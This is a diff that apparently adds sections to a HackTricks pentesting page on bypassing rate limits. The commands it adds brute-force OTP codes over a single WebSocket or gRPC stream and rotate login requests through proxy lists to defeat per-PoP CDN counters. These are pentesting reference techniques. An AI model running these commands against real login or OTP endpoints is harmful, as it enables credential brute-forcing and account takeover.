Add content from: Research Update: Enhanced src/pentesting-web/rate-limit-bypa...

Author: HackTricks News Bot

src/pentesting-web/rate-limit-bypass.md

@@ -110,6 +110,41 @@ A classic token-bucket or leaky-bucket limiter *resets* on a fixed time boundary
 
 This simple optimisation can more than double your throughput without touching any other bypass technique.
 
+### Upgrading to WebSockets / gRPC streaming after the handshake
+
+Many edge rate-limiters only inspect the **initial HTTP request**. Once the connection is upgraded to WebSocket (HTTP 101) or gRPC bidirectional streaming, subsequent messages often bypass request-per-second counters because they are no longer separate HTTP requests. Cloudflare’s own docs note that only the initial upgrade request is subject to WAF/rate-limiting rules; frames sent afterwards are opaque.
+
+Practical workflow:
+
+```bash
+# Flood 1,000 OTP guesses through a single WebSocket connection
+seq -w 000000 000999 | websocat -n ws://target.tld/api/verify-ws
+
+# gRPC streaming: send multiple Verify requests in one stream
+grpcurl -d @ -plaintext target.tld:50051 service.VerifyOTP/Stream <<'EOF'
+{ "code": "111111" }
+{ "code": "222222" }
+{ "code": "333333" }
+EOF
+```
+
+If the login/OTP endpoint exposes both HTTP and WebSocket/gRPC variants, establish the upgraded channel first and then spray codes within that single connection to evade per-request throttles.
+
+### Exploiting CDN PoP‑sharded counters
+
+Some CDNs shard rate-limit counters **per data center/PoP instead of globally**. Cloudflare explicitly states counters are not shared across data centers. By routing requests through egress nodes in many regions (residential proxy pools, anycast VPNs, or cloud VMs pinned to different continents), you multiply the allowed throughput: every PoP maintains an independent bucket for the same key.
+
+Quick and dirty layout using open proxies (example with `proxychains` + a country‑rotating list):
+
+```bash
+for p in $(cat proxies.txt); do
+  HTTPS_PROXY=$p curl -s -X POST https://target/api/login -d @payload.json &
+done
+wait
+```
+
+Make sure the limiter key is not per-account; otherwise also rotate user IDs / session tokens.
+
 ---
 
 ## Tools
@@ -121,7 +156,9 @@ This simple optimisation can more than double your throughput without touching a
 
 ## References
 
-- PortSwigger Research – “Bypassing rate limits with GraphQL aliasing”  (2023)  <https://portswigger.net/research/graphql-authorization-bypass>  
-- PortSwigger Research – “HTTP/2: The Sequel is Always Worse” (section *Connection-based throttling*) (2024)  <https://portswigger.net/research/http2>  
+- [PortSwigger Research – “Bypassing rate limits with GraphQL aliasing” (2023)](https://portswigger.net/research/graphql-authorization-bypass)
+- [PortSwigger Research – “HTTP/2: The Sequel is Always Worse” (connection-based throttling) (2024)](https://portswigger.net/research/http2)
+- [Cloudflare Docs – WebSockets & WAF applicability (2025)](https://developers.cloudflare.com/network/websockets/)
+- [Cloudflare Docs – Request rate calculation and PoP-local counters (2025)](https://developers.cloudflare.com/waf/rate-limiting-rules/request-rate/)
 
 {{#include ../banners/hacktricks-training.md}}